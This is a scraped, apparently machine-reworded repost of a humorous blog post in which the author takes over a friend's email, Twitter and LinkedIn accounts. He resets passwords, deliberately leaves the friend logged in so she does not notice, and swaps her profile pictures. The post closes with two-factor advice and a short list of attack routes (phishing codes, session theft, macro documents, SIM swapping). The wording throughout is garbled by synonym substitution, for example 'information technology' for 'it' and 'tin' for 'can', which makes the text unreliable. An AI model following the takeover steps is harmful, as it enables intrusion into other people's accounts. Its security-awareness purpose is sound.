Is this considering qwerty1 was a password present in the LinkedIn hack in 2012? Or because information technology's only a mutual password? For a cursory moment I panic, merely then I realise I tin can just set Diana'due south password to her email password, wertyu2.

Astute readers volition have noticed this little guy in the screenshot to a higher place.

LinkedIn is asking me if I'd similar to log out of Diana's LinkedIn account on all devices while I'm resetting the password. That'due south REAL nice of you to offer old mate LinkedIn merely I'thousand absolutely golden as information technology is in terms of logouts then don't even worry about it I'll exist only fine how it is NO Actually don't trouble yourself, I'm sure your CPU cycles are busy displaying everyone's 6000 word Thinkpieces about "Cyber" for "Non-technical Business organization Decision Makers".

Yeah and so I submit that grade 100% checkbox-free, and Diana remains logged in to LinkedIn on all her devices, none the wiser.

Step 2: Bring in the dark-green boys

I enlist the help of a talented friend to photoshop anybody's #ane boy next door Luigi subtly into Diana's profile moving-picture show on Twitter, similar a green guardian affections.

I tin can't testify you Diana's pictures, so here's me doing like photoshops to Your Boy And Mine, V Time Celebrity MasterChef Winner And The Inventor of Bitcoin, Requite It Up For Dr. Barack Obama Everybody:

At about this fourth dimension I tweet about our sweet green male child then that if Diana sees her guardian affections Luigi, she'll know it was me. This is like my calling card except…. well information technology's not really like a calling card information technology'southward pretty dorky to be honest but just LOOK at that wholesome lad, you merely KNOW he'd help y'all prepare a flat tyre, and he'd but be as well gosh darn polite to correct you if you said "thanks light-green mario" and then really if you think virtually it I guess information technology IS like a calling card.

Adjacent upward I log into her LinkedIn account, get overwhelmed past her fifteen LinkedIn notifications, 7 new contour views, eleven new Key People To Bother, and several pop ups telling me about new features I can use to invite people to bring together my professional network on LinkedIn™®©. Then I modify her profile picture to my really skilful version.

For well-nigh a week, Diana continues her Twitter and LinkedIn(?) usage whilst existence silently Luigi'd. Diana goes on viewing what I can only assume to be the sharpest international political discourse on Twitter, and getting slightly more LinkedIn profile views from observant recruiters who are too fans of the hit 2001 ghostbusting game, Luigi's Mansion.

Well that just about wraps up Performance Luigi. Glad that'southward all washed and dusted.

Although…

I'm basically a Luigi technician at this point, and information technology would exist a shame to permit all that piece of work go to waste product. And then permit's just practice

~one more matter~

Functioning Waluigi: A dark turn for mature audiences

Waluigi, true to his character, is much more directly.

Damn Right this new profile strength is "Avant-garde."

Delight savour these half-broiled opsec-enabled²⁶ tweets²⁷.

I also make Diana follow a agglomeration of Waluigi fan accounts (in that location are a lot), Nintendo of America, and @EmojiAquarium considering it's a damn good business relationship.

Office 5: Epilogue

Diana likes her new Waluigi life and so much she keeps it all up there, and even changes her Facebook photo to a Waluigi'd one.

I meet up with her and ask her about her side of the story a few days afterwards.

Here are some pick quotes:

"I've since listened to a lot of Waluigi songs" "Waluigi is the ultimate symbol of postmodernism, he exists merely as a foil"

I ask her "How do you lot call back I did information technology?". She says I must take hacked her e-mail and reset her Twitter password, but she has no idea how I hacked her electronic mail.

When I prove her the electronic mail chain with Kathleen on my computer her jaw drops for several seconds.

"You catfished me!"

We go back to the aforementioned ramen place later the interview. The credits roll.

"await but i am very afraid after reading this blog postal service, how practice I not get 360 noscope hacked similar diana tho"

Hey kids, it's me, "Alex". We've had a lot of fun today, merely at present it'due south time to talk nigh the real issues. The moral of this story is that it's really easy for someone else to know your countersign. Fret not, for you lot are young and extremely online, and information technology's not too late for you yet.

Stride 1: Go to https://haveibeenpwned.com and type in your email address. This doesn't actually exercise anything, it's just to instill sufficient fright in y'all.

Pace 2²⁸: Get to your email and enable "Two-step Authentication". You tin go to https://www.google.com.au/landing/2step if yous use gmail. If you use Hotmail and so I dunno, there's probably like a SkyCloud 360 X LIVE subscription you can purchase that lets you practise it.

At present, as well every bit your email password, y'all also type in a lawmaking from an app on your phone. Or y'all can take the code SMSed to you on your pastel-pink flip telephone if y'all wanna relive the 90s²⁹.

If Diana had Verified Skilful Content Two-stride Authentication turned on, and so I would have had to get a two-factor code AND her password. I would accept had to either:

• Phish the code as well every bit the password (but the code expires in less than threescore seconds)
• Physically go to the aforementioned place as her, connect to the same WiFi, and steal her browser session
• Electronic mail her a Word Md with a macro in it that gives me control of her laptop, and steal her browser cookies from it
• Phone call upwards her phone provider and trick them into pointing her phone number at my SIM card

All of these are more work and college risk, and so hackers oft just motility on to lower hanging fruit. That's you lot in this situation. You lot're the delicious fruit. And the hackers are…. giraffes? Yeah. Watch out for giraffes.

---

Freshly baked shoutouts to My Absolute Homeslices for being my web log-review senpais, Diana for being chill, and to the hacking software released at DEFCON 25: Aerobatic dot io

If you lot want to talk to me almost this, hit me upward in the tweet zone (@mangopdf) or straight your browser to mango.pdf.zone

gageejew1987.blogspot.com

Source: https://defaultnamehere.tumblr.com/post/163734466355/operation-luigi-how-i-hacked-my-friend-without

Share this post